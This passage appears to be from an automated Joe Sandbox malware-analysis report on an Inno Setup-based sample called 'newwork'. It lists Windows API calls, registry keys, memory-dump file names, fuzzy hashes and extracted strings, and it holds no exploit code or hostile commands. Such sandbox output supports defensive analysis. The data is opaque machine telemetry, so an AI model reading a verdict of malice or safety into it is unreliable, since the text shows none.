• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
• Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
• Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
• Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
APIs
• GetMenu.USER32(00000000), ref: 00421361
• SetMenu.USER32(00000000,00000000), ref: 0042137E
• SetMenu.USER32(00000000,00000000), ref: 004213B3
• SetMenu.USER32(00000000,00000000), ref: 004213CF
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Menu
• String ID:
• API String ID: 3711407533-0
• Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
• Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
• Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
• Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
APIs
• SendMessageA.USER32(?,?,?,?), ref: 00416B84
• SetTextColor.GDI32(?,00000000), ref: 00416B9E
• SetBkColor.GDI32(?,00000000), ref: 00416BB8
• CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Color$CallMessageProcSendTextWindow
• String ID:
• API String ID: 601730667-0
• Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
• Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
• Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
• Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
APIs
• GetDC.USER32(00000000), ref: 0042311E
• EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
• ReleaseDC.USER32(00000000,00000000), ref: 00423144
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CapsDeviceEnumFontsRelease
• String ID:
• API String ID: 2698912916-0
• Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
• Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
• Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
• Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C590,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID:
• API String ID: 730355536-0
APIs
  • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
• FlushFileBuffers.KERNEL32(?), ref: 0045C499
Strings
• EndOffset range exceeded, xrefs: 0045C3CD
• NumRecs range exceeded, xrefs: 0045C396
Similarity
• API ID: File$BuffersFlush
• String ID: EndOffset range exceeded$NumRecs range exceeded
• API String ID: 3593489403-659731555
APIs
  • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
  • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
  • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
  • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
  • Part of subcall function 004063C4: 6FCB1CD0.COMCTL32(00498BC5), ref: 004063C4
  • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
  • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
  • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
  • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
  • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
  • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
  • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
  • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
  • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
  • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
  • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
  • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
  • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
  • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
  • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
  • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
  • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
  • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
• SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
  • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
  • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
  • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
  • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
Similarity
• API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
• String ID: Setup
• API String ID: 504348408-3839654196
APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
Similarity
• API ID: QueryValue
• String ID: $=H
• API String ID: 3660427363-3538597426
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
• GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: .tmp
• API String ID: 1375471231-2986845003
APIs
  • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
  • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
  • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
  • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
  • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
  • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
  • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
  • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
  • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
  • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
Similarity
• API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
• String ID: SHGetKnownFolderPath$shell32.dll
• API String ID: 3869789854-2936008475
APIs
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
Similarity
• API ID: Close
• String ID: RegisteredOrganization$RegisteredOwner
• API String ID: 3535843008-1113070880
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Similarity
• API ID: CloseCreateErrorFileHandleLast
• String ID: CreateFile
• API String ID: 2528220319-823142352
APIs
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                • API String ID: 71445658-2565060666
APIs
  • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressErrorInitializeLibraryLoadModeProc
• String ID: SHCreateItemFromParsingName$shell32.dll
• API String ID: 2906209438-2320870614
APIs
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressErrorLibraryLoadModeProc
• String ID: SHPathPrepareForWriteA$shell32.dll
• API String ID: 2492108670-2683653824
APIs
• LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID:
• API String ID: 2574300362-0
APIs
• GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
• AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
• AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Menu$Append$System
• String ID:
• API String ID: 1489644407-0
APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
• TranslateMessage.USER32(?), ref: 0042448F
• DispatchMessageA.USER32(?), ref: 00424499
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
APIs
• SetPropA.USER32(00000000,00000000), ref: 0041666A
• SetPropA.USER32(00000000,00000000), ref: 0041667F
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Prop$Window
• String ID:
• API String ID: 3363284559-0
APIs
• IsWindowVisible.USER32(?), ref: 0041EE64
• IsWindowEnabled.USER32(?), ref: 0041EE6E
• EnableWindow.USER32(?,00000000), ref: 0041EE94
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: Window$EnableEnabledVisible
• String ID:
• API String ID: 3234591441-0
APIs
• SetActiveWindow.USER32(?), ref: 0046A02D
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: ActiveWindow
• String ID: PrepareToInstall
• API String ID: 2558294473-1101760603
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID:
• String ID: /:*?"<>|
• API String ID: 0-4078764451
APIs
• SetActiveWindow.USER32(?), ref: 00482676
Strings
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: ActiveWindow
• String ID: InitializeWizard
• API String ID: 2558294473-2356795471
                                                                                • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                • API String ID: 47109696-1019749484
                                                                                • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                APIs
                                                                                • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                Strings
                                                                                • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: Inno Setup: Setup Version
                                                                                • API String ID: 3702945584-4166306022
                                                                                • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
